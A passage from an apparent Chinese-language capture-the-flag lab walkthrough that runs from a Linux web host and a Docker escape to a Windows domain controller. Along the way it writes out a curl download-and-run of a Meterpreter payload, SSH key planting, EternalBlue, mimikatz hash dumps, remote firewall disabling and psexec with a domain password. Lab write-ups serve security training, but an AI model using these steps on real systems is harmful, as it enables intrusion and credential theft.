ssh -i target -R 0.0.0.0:4444:localhost:4444 -R 0.0.0.0:6666:localhost:6666 root@192.168.111.20 -NWP 篇幅较长,避免大家遗忘,这里的 target 是私钥文件。
开启 MSF:
bash
msfconsole选择模块:
exploit/multi/script/web_delivery相关配置:
set target Linux
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.52.10
set SRVPORT 6666执行模块:
会得到一串 linux 命令(wget 开头),但是目标上并没有 wget 命令,经过搜查发现,curl 是可以正常使用的,这个也可以用于下载文件:
cd /tmp && curl -O http://192.168.52.10:6666/XTUK5wgCV注意找到一个能写能改权限的目录。
下载成功后,赋予权限:
chmod +x XTUK5wgCV然后,用我们之前找到的提权方法,以 root 权限执行该文件,这样就可以获得 root 权限的 meterpreter:
(www-data:/tmp) $ printf '#!/bin/bash\n/bin/bash -c '/tmp/XTUK5wgCV'\n' > /tmp/ps
(www-data:/tmp) $ export PATH=/tmp:$PATH && /home/jobs/shell执行成功后,会发现 MSF 上线了一个 session(我这里是 session 2),附上去:
sessions -i 2查看权限:
5、容器逃逸
容器内没啥有用的信息,尝试容器逃逸。
最容易操作、也最容易想到的就是"Privileged Container Escape(特权容器逃逸)"
首先,确认容器是否为 Privileged 模式(逃逸前提):
bash
lsblk
fdisk -l 2>/dev/null输出:
root@8e172820ac78:/tmp# lsblk
lsblk
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT
sda 8:0 0 10G 0 disk
|-sda1 8:1 0 8G 0 part /etc/hosts
|-sda2 8:2 0 1K 0 part
`-sda5 8:5 0 2G 0 part [SWAP]
root@8e172820ac78:/tmp# fdisk -l 2>/dev/null
fdisk -l 2>/dev/null
Disk /dev/sda: 10 GiB, 10737418240 bytes, 20971520 sectors
Disk model: Virtual disk
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x00063af9
Device Boot Start End Sectors Size Id Type
/dev/sda1 * 2048 16779263 16777216 8G 83 Linux
/dev/sda2 16781310 20969471 4188162 2G 5 Extended
/dev/sda5 16781312 20969471 4188160 2G 82 Linux swap / Solaris首先,宿主机的整块物理磁盘能直接看到:
/dev/sda并且 lsblk 显示出来的 MOUNTPOINT 字段中有记录显示 /etc/hosts,这正是 Docker 将宿主机的 /etc/hosts bind mount 进容器的典型表现。
创建一个目录用于挂在宿主机的真实目录:
bash
mkdir /hack显示:
root@8e172820ac78:/tmp# mkdir /hack
mkdir /hack
mkdir: cannot create directory '/hack': File exists说明目录已经存在了,直接挂在就行:
bash
mount /dev/sda1 /hack挂载成功后,/hack 目录就是宿主机的完整根目录,比如:/hack/etc/passwd 就是宿主机的 /etc/passwd)
但是这么转换还是比较麻烦,也容易出现问题,使用 chroot 更改目录:
chroot /hack这样一来,/ 就变成了 /hack。
切换宿主机 shell:
bash
/bin/bash验证是否切换成功:
bash
cat /etc/hostname输出:
ubuntu逃逸成功,但是目前只是达到了文件系统的逃逸,网络层面还是在容器里面,查看 ip addr 就知道了:
bash
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
8: eth0@if9: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:ac:11:00:02 brd ff:ff:ff:ff:ff:ff
inet 172.17.0.2/16 brd 172.17.255.255 scope global eth0
valid_lft forever preferred_lft forever5、获取宿主机的 root
之前扫描能得到主机开放了 22 端口,我们故技重施,写入 ssh 公钥,然后用 ssh 直接连接靶机,这样就能得到完整的宿主机 root。
找到之前生成的公钥,将里面的内容输出出来:
bash
❯ cat target.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDYrIRFtsijwuU43JeBFUwC04tSP3jNnl3ujMwgOO7FIOaDe0c7Wsp+qk/vpSKfhnTfyPAmHrO5q58zbDuFCzBrQrUNxUXVXJaO6k8csJ2VuPBh5YN7W61q9Cs62BacSX9QHDv+EhCkewVW2O3oGWbvWODnQh8tbwV815HyP15hlIXrisEp9DHWqhvz2scKYcVPw38g31yUJkcMU4T83yMziBSIKgDi/6+RB7JsJXZ+x72QAQtFes6JHYDl1Z3NQmPCdesww/Bx0hwXOx3d9LJAtpV9WIPMVbK05bMlwdDs321yX060WZOJwrQBgG2gqLNANjjouOIJlyrHLNRt5QfACNkFWNehWtckYLtV1/03cF02medJ/IJMt1yokLo/O2hcG0NK8vOxbUbcBrXUfHxHUWSUYwyag7L0SYctycjCi7lIXze8UhTf7C8oT7fPPzRiuoEu6KRuxXCxEJEOBa928iD/OhLu0JlVf+W2NrAnw3zJZJjh9ckHhATu+oFagg0= zyf@kali由于宿主机上没有对应目录和文件,先创建目录:
mkdir -p /root/.ssh写入:
cat > /root/.ssh/authorized_keys << 'EOF'
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDYrIRFtsijwuU43JeBFUwC04tSP3jNnl3ujMwgOO7FIOaDe0c7Wsp+qk/vpSKfhnTfyPAmHrO5q58zbDuFCzBrQrUNxUXVXJaO6k8csJ2VuPBh5YN7W61q9Cs62BacSX9QHDv+EhCkewVW2O3oGWbvWODnQh8tbwV815HyP15hlIXrisEp9DHWqhvz2scKYcVPw38g31yUJkcMU4T83yMziBSIKgDi/6+RB7JsJXZ+x72QAQtFes6JHYDl1Z3NQmPCdesww/Bx0hwXOx3d9LJAtpV9WIPMVbK05bMlwdDs321yX060WZOJwrQBgG2gqLNANjjouOIJlyrHLNRt5QfACNkFWNehWtckYLtV1/03cF02medJ/IJMt1yokLo/O2hcG0NK8vOxbUbcBrXUfHxHUWSUYwyag7L0SYctycjCi7lIXze8UhTf7C8oT7fPPzRiuoEu6KRuxXCxEJEOBa928iD/OhLu0JlVf+W2NrAnw3zJZJjh9ckHhATu+oFagg0= zyf@kali
EOF设置正确的权限:
chmod 700 /root/.ssh
chmod 600 /root/.ssh/authorized_keys尝试连接:
bash
proxychains ssh -i target root@192.168.52.20但是居然还要我输出密码,查看调试信息:
proxychains ssh -i target root@192.168.52.20 -vvv日志显示:
debug1: send_pubkey_test: no mutual signature algorithm失败的原因:SSH 版本不兼容,目标宿主机运行的是 OpenSSH 6.6.1,而的 Kali 客户端是 OpenSSH 10.2。新版客户端默认禁用了 ssh-rsa(SHA1签名),而老服务端只支持这个算法,双方找不到共同的签名算法,导致公钥认证直接跳过转向密码认证。
指定算法:
bash
proxychains ssh -i target root@192.168.52.20 -o PubkeyAcceptedAlgorithms=+ssh-rsa -o HostkeyAlgorithms=+ssh-rsa成功:
root@ubuntu:~# ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:50:56:b1:7e:66 brd ff:ff:ff:ff:ff:ff
inet 192.168.52.20/24 brd 192.168.52.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::250:56ff:feb1:7e66/64 scope link
valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:50:56:b1:4a:b8 brd ff:ff:ff:ff:ff:ff
inet 192.168.93.10/24 brd 192.168.93.255 scope global eth1
valid_lft forever preferred_lft forever
inet6 fe80::250:56ff:feb1:4ab8/64 scope link
valid_lft forever preferred_lft forever
4: br-1d665e13ee58: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
link/ether 02:42:a8:01:1e:34 brd ff:ff:ff:ff:ff:ff
inet 172.20.0.1/16 brd 172.20.255.255 scope global br-1d665e13ee58
valid_lft forever preferred_lft forever
5: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:29:fc:b3:bf brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
inet6 fe80::42:29ff:fefc:b3bf/64 scope link
valid_lft forever preferred_lft forever
6: br-f0d07941b332: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
link/ether 02:42:08:d3:ed:3c brd ff:ff:ff:ff:ff:ff
inet 172.19.0.1/16 brd 172.19.255.255 scope global br-f0d07941b332
valid_lft forever preferred_lft forever
7: br-05384b1b0df2: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
link/ether 02:42:77:1a:64:7a brd ff:ff:ff:ff:ff:ff
inet 172.18.0.1/16 brd 172.18.255.255 scope global br-05384b1b0df2
valid_lft forever preferred_lft forever
9: vetha18b54f@if8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default
link/ether ba:51:d0:c7:b2:be brd ff:ff:ff:ff:ff:ff
inet6 fe80::b851:d0ff:fec7:b2be/64 scope link
valid_lft forever preferred_lft forever6、Fscan
故技重施,上传 Fscan 直接扫描域内网。
在此之前,查看路由信息和防火墙情况:
root@ubuntu:~# ip route show
default via 192.168.52.2 dev eth0
169.254.0.0/16 dev eth1 scope link metric 1000
172.17.0.0/16 dev docker0 proto kernel scope link src 172.17.0.1
172.18.0.0/16 dev br-05384b1b0df2 proto kernel scope link src 172.18.0.1
172.19.0.0/16 dev br-f0d07941b332 proto kernel scope link src 172.19.0.1
172.20.0.0/16 dev br-1d665e13ee58 proto kernel scope link src 172.20.0.1
192.168.52.0/24 dev eth0 proto kernel scope link src 192.168.52.20
192.168.93.0/24 dev eth1 proto kernel scope link src 192.168.93.10直连域内网。
bash
root@ubuntu:~# iptables -L -v -n 2>/dev/null
Chain INPUT (policy ACCEPT 2829 packets, 279K bytes)
pkts bytes target prot opt in out source destination
Chain FORWARD (policy DROP 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
6009 13M DOCKER-USER all -- * * 0.0.0.0/0 0.0.0.0/0
6009 13M DOCKER-ISOLATION-STAGE-1 all -- * * 0.0.0.0/0 0.0.0.0/0
2591 7215K ACCEPT all -- * docker0 0.0.0.0/0 0.0.0.0/0 ctstate RELATED,ESTABLISHED
179 10740 DOCKER all -- * docker0 0.0.0.0/0 0.0.0.0/0
3239 6271K ACCEPT all -- docker0 !docker0 0.0.0.0/0 0.0.0.0/0
0 0 ACCEPT all -- docker0 docker0 0.0.0.0/0 0.0.0.0/0
0 0 ACCEPT all -- * br-05384b1b0df2 0.0.0.0/0 0.0.0.0/0 ctstate RELATED,ESTABLISHED
0 0 DOCKER all -- * br-05384b1b0df2 0.0.0.0/0 0.0.0.0/0
0 0 ACCEPT all -- br-05384b1b0df2 !br-05384b1b0df2 0.0.0.0/0 0.0.0.0/0
0 0 ACCEPT all -- br-05384b1b0df2 br-05384b1b0df2 0.0.0.0/0 0.0.0.0/0
0 0 ACCEPT all -- * br-f0d07941b332 0.0.0.0/0 0.0.0.0/0 ctstate RELATED,ESTABLISHED
0 0 DOCKER all -- * br-f0d07941b332 0.0.0.0/0 0.0.0.0/0
0 0 ACCEPT all -- br-f0d07941b332 !br-f0d07941b332 0.0.0.0/0 0.0.0.0/0
0 0 ACCEPT all -- br-f0d07941b332 br-f0d07941b332 0.0.0.0/0 0.0.0.0/0
0 0 ACCEPT all -- * br-1d665e13ee58 0.0.0.0/0 0.0.0.0/0 ctstate RELATED,ESTABLISHED
0 0 DOCKER all -- * br-1d665e13ee58 0.0.0.0/0 0.0.0.0/0
0 0 ACCEPT all -- br-1d665e13ee58 !br-1d665e13ee58 0.0.0.0/0 0.0.0.0/0
0 0 ACCEPT all -- br-1d665e13ee58 br-1d665e13ee58 0.0.0.0/0 0.0.0.0/0
Chain OUTPUT (policy ACCEPT 2050 packets, 181K bytes)
pkts bytes target prot opt in out source destination
Chain DOCKER (4 references)
pkts bytes target prot opt in out source destination
179 10740 ACCEPT tcp -- !docker0 docker0 0.0.0.0/0 172.17.0.2 tcp dpt:80
Chain DOCKER-ISOLATION-STAGE-1 (1 references)
pkts bytes target prot opt in out source destination
3239 6271K DOCKER-ISOLATION-STAGE-2 all -- docker0 !docker0 0.0.0.0/0 0.0.0.0/0
0 0 DOCKER-ISOLATION-STAGE-2 all -- br-05384b1b0df2 !br-05384b1b0df2 0.0.0.0/0 0.0.0.0/0
0 0 DOCKER-ISOLATION-STAGE-2 all -- br-f0d07941b332 !br-f0d07941b332 0.0.0.0/0 0.0.0.0/0
0 0 DOCKER-ISOLATION-STAGE-2 all -- br-1d665e13ee58 !br-1d665e13ee58 0.0.0.0/0 0.0.0.0/0
6009 13M RETURN all -- * * 0.0.0.0/0 0.0.0.0/0
Chain DOCKER-ISOLATION-STAGE-2 (4 references)
pkts bytes target prot opt in out source destination
0 0 DROP all -- * docker0 0.0.0.0/0 0.0.0.0/0
0 0 DROP all -- * br-05384b1b0df2 0.0.0.0/0 0.0.0.0/0
0 0 DROP all -- * br-f0d07941b332 0.0.0.0/0 0.0.0.0/0
0 0 DROP all -- * br-1d665e13ee58 0.0.0.0/0 0.0.0.0/0
3239 6271K RETURN all -- * * 0.0.0.0/0 0.0.0.0/0
Chain DOCKER-USER (1 references)
pkts bytes target prot opt in out source destination
6009 13M RETURN all -- * * 0.0.0.0/0 0.0.0.0/0
root@ubuntu:~# ufw status 2>/dev/null
Status: inactive
root@ubuntu:~# nft list ruleset 2>/dev/null
root@ubuntu:~# 可以看出:宿主机本机没有入站和出站的限制,直接上 fscan:
bash
proxychains scp -o PubkeyAcceptedAlgorithms=+ssh-rsa -o HostkeyAlgorithms=+ssh-rsa -i target /usr/local/bin/fscan root@192.168.52.20:/tmp/赋予权限之后,直接运行:
root@ubuntu:/tmp# ./fscan -h 192.168.93.0/24
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
(icmp) Target 192.168.93.10 is alive
(icmp) Target 192.168.93.20 is alive
(icmp) Target 192.168.93.30 is alive
(icmp) Target 192.168.93.40 is alive
[*] Icmp alive hosts len is: 4
192.168.93.10:8000 open
192.168.93.30:88 open
192.168.93.20:8080 open
192.168.93.20:1081 open
192.168.93.20:1080 open
192.168.93.40:445 open
192.168.93.30:445 open
192.168.93.20:445 open
192.168.93.40:139 open
192.168.93.30:139 open
192.168.93.20:139 open
192.168.93.40:135 open
192.168.93.30:135 open
192.168.93.20:135 open
192.168.93.10:22 open
[*] alive ports len is: 15
start vulscan
[*] NetInfo
[*]192.168.93.30
[->]DC
[->]192.168.93.30
[+] MS17-010 192.168.93.30 (Windows Server 2012 R2 Datacenter 9600)
[+] MS17-010 192.168.93.40 (Windows 7 Professional 7601 Service Pack 1)
[*] NetBios 192.168.93.30 [+] DC:DC.whoamianony.org Windows Server 2012 R2 Datacenter 9600
[+] MS17-010 192.168.93.20 (Windows 7 Professional 7601 Service Pack 1)
[*] NetBios 192.168.93.40 PC2.whoamianony.org Windows 7 Professional 7601 Service Pack 1
[*] WebTitle http://192.168.93.20:8080 code:200 len:10065 title:通达OA网络智能办公系统
[+] InfoScan http://192.168.93.20:8080 [通达OA]
[*] WebTitle http://192.168.93.10:8000 code:200 len:17474 title:Laravel
[+] InfoScan http://192.168.93.10:8000 [Laravel]
[+] PocScan http://192.168.93.20:8080 tongda-user-session-disclosure
[+] PocScan http://192.168.93.10:8000 poc-yaml-laravel-cve-2021-3129
已完成 14/15 [-] ssh 192.168.93.10:22 root pass@123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 14/15 [-] ssh 192.168.93.10:22 root 1 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 14/15 [-] ssh 192.168.93.10:22 root root111 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 14/15 [-] ssh 192.168.93.10:22 root root@2019 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 14/15 [-] ssh 192.168.93.10:22 root 12345678 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 14/15 [-] ssh 192.168.93.10:22 root 123456789 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 15/15
[*] 扫描结束,耗时: 7m15.055664472s很多都是我们之前分析出来的信息,但是获得了两条非常有价值的信息:
域内的两台靶机都存在永恒之蓝漏洞。
八、再回永恒之蓝
优先测试 192.168.93.30(域控),老样子利用(由于之前讲述过利用方法,下面讲解会稍显简略)。
建立代理:
proxychains ssh -o PubkeyAcceptedAlgorithms=+ssh-rsa -o HostkeyAlgorithms=+ssh-rsa -i target -D 1090 -N -C root@192.168.52.20注意换个端口。
将 MSF 的全局代理换一个:
setg Proxies socks5h://127.0.0.1:1090这样一来,MSF 就能直通域环境了。
但是,尝试多次都没有成功,换 192.168.93.40,直接获得 meterpreter:
meterpreter > sysinfo
Computer : PC2
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : zh_CN
Domain : WHOAMIANONY
Logged On Users : 1
Meterpreter : x64/windows建立一个域内网路由:
run autoroute -s 192.168.93.0/24
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 192.168.93.0/255.255.255.0...
[+] Added route to 192.168.93.0/255.255.255.0 via 192.168.93.40
[*] Use the -p option to list all active routes搜集凭证后,得到的还是自己的机器账户的信息:
meterpreter > load kiwi
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
Username Domain NTLM SHA1
-------- ------ ---- ----
PC2$ WHOAMIANONY 9d1bd19fad217f76570f6965f2d3cd63 06c32efff7257e555904cceac5b007ca7b685ec5
wdigest credentials
===================
Username Domain Password
-------- ------ --------
(null) (null) (null)
PC2$ WHOAMIANONY 02 be bd 88 d1 38 04 51 97 8a e6 18 67 05 5b 56 7e 37 be 79 af 00 87 ff 24 fa 72 47 3c 30 aa a0 7e ee b4 f6 3b 7e 06 00
26 b9 2e ad a4 fe 3c 6f 98 7c ce 58 2f 3f e6 89 70 7e 4c 46 d6 ff 09 a2 40 e1 f9 53 ad 49 9e 6c 0e c0 26 73 29 b4 52 7
5 a3 f1 5c 3e d3 a5 5a 8b 71 b0 6c 5e 60 a7 33 27 49 09 f4 f0 a7 01 7f f5 8b bd e8 e6 43 f4 cd b1 0a 8e 81 16 89 95 20
89 b1 82 bd 85 28 cc 0e 63 47 48 6d 9b a3 d2 08 41 cd d8 8c 99 61 dd e5 f2 cd c1 32 a0 91 4a 52 67 d5 da 44 c5 c2 02 de
76 fc 61 48 14 12 81 ad 97 b0 02 a8 6f 46 06 ab 26 02 20 4c 9f 56 51 d8 a4 aa 2c df 94 7b a4 b3 dd 08 a3 db dc 48 da 6
2 25 83 fd 71 fd 50 bc 94 e9 c5 d8 9f 2d 04 8c 6b ab 00 dc 1c 10 b9 b7 dc 62 c5 cd 28 14 fe d9 a5 28 f5 ee 51 1f 11 7c
fe e2
kerberos credentials
====================
Username Domain Password
-------- ------ --------
(null) (null) (null)
pc2$ WHOAMIANONY.ORG 02 be bd 88 d1 38 04 51 97 8a e6 18 67 05 5b 56 7e 37 be 79 af 00 87 ff 24 fa 72 47 3c 30 aa a0 7e ee b4 f6 3b 7e 0
6 00 26 b9 2e ad a4 fe 3c 6f 98 7c ce 58 2f 3f e6 89 70 7e 4c 46 d6 ff 09 a2 40 e1 f9 53 ad 49 9e 6c 0e c0 26 73 29
b4 52 75 a3 f1 5c 3e d3 a5 5a 8b 71 b0 6c 5e 60 a7 33 27 49 09 f4 f0 a7 01 7f f5 8b bd e8 e6 43 f4 cd b1 0a 8e 81
16 89 95 20 89 b1 82 bd 85 28 cc 0e 63 47 48 6d 9b a3 d2 08 41 cd d8 8c 99 61 dd e5 f2 cd c1 32 a0 91 4a 52 67 d5 d
a 44 c5 c2 02 de 76 fc 61 48 14 12 81 ad 97 b0 02 a8 6f 46 06 ab 26 02 20 4c 9f 56 51 d8 a4 aa 2c df 94 7b a4 b3 dd
08 a3 db dc 48 da 62 25 83 fd 71 fd 50 bc 94 e9 c5 d8 9f 2d 04 8c 6b ab 00 dc 1c 10 b9 b7 dc 62 c5 cd 28 14 fe d9
a5 28 f5 ee 51 1f 11 7c fe e2非常奇怪。
meterpreter > kiwi_cmd "lsadump::cache"
Domain : PC2
SysKey : fd4639f4e27c79683ae9fee56b44393f
Local name : PC2 ( S-1-5-21-1982601180-2087634876-2293013296 )
Domain name : WHOAMIANONY ( S-1-5-21-1315137663-3706837544-1429009142 )
Domain FQDN : whoamianony.org
Policy subsystem is : 1.11
LSA Key(s) : 1, default {c4f0262f-f9ba-5833-89e5-1264beb97c37}
[00] {c4f0262f-f9ba-5833-89e5-1264beb97c37} 12ec51d5510d2e28b5f273a98a547e21ceec081867af5348f219b08215f27558
* Iteration is set to default (10240)
[NL$1 - 2021/2/22 18:55:30]
RID : 00000458 (1112)
User : WHOAMIANONY\bunny
MsCacheV2 : 00dd17d44798d1ac5f335365db696d1e
[NL$2 - 2021/2/22 17:40:39]
RID : 000001f4 (500)
User : WHOAMIANONY\Administrator
MsCacheV2 : 2f44261182b156fe4e2cb03b39925b72
[NL$4 - 2025/9/18 9:06:20]
RID : 0000045b (1115)
User : WHOAMIANONY\moretz
MsCacheV2 : d6d791a922b0578b81c0a93a3c9a5382得到的依旧是 MsCacheV2 的信息。
九、查看 WP
查看官方 WP:
https://www.freebuf.com/articles/network/264560.html直接在 192.168.52.30 上通过抓凭证直接抓到了域管的明文密码(Whoami2021)......
好吧,应该是靶场环境的问题(已反馈给棉花糖)
不过打靶场的乐趣恰恰在此。
十、登入域控拿到 Flag
那么,我们"假装"我们找到了域管的明文密码,直接尝试登入:
proxychains impacket-psexec \
WHOAMIANONY/administrator:Whoami2021@192.168.93.30失败了,可能是有防火墙,我们可以通过已有 session 外加密码直接关闭域控的防火墙:
meterpreter > shell
net use \\192.168.93.30\ipc$ "Whoami2021" /user:"WHOAMIANONY\administrator"
sc \\192.168.93.30 create disablefw binpath= "netsh advfirewall set allprofiles state off"
sc \\192.168.93.30 start disablefw
exit完成之后,再次尝试:
proxychains impacket-psexec \
WHOAMIANONY/administrator:Whoami2021@192.168.93.30
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[proxychains] Strict chain ... 127.0.0.1:1090 ... 192.168.93.30:445 ... OK
[*] Requesting shares on 192.168.93.30.....
[*] Found writable share ADMIN$
[*] Uploading file XDDSTHvz.exe
[*] Opening SVCManager on 192.168.93.30.....
[*] Creating service fqAv on 192.168.93.30.....
[*] Starting service fqAv.....
[proxychains] Strict chain ... 127.0.0.1:1090 ... 192.168.93.30:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1090 ... 192.168.93.30:445 ... OK
[!] Press help for extra shell commands
[proxychains] Strict chain ... 127.0.0.1:1090 ... 192.168.93.30:445 ... OK
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
Microsoft Windows [�汾 6.3.9600]
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
(c) 2013 Microsoft Corporation����������Ȩ����
C:\Windows\system32> 成功,后面就是找 flag,读取 flag 的事情了,这里不再赘述。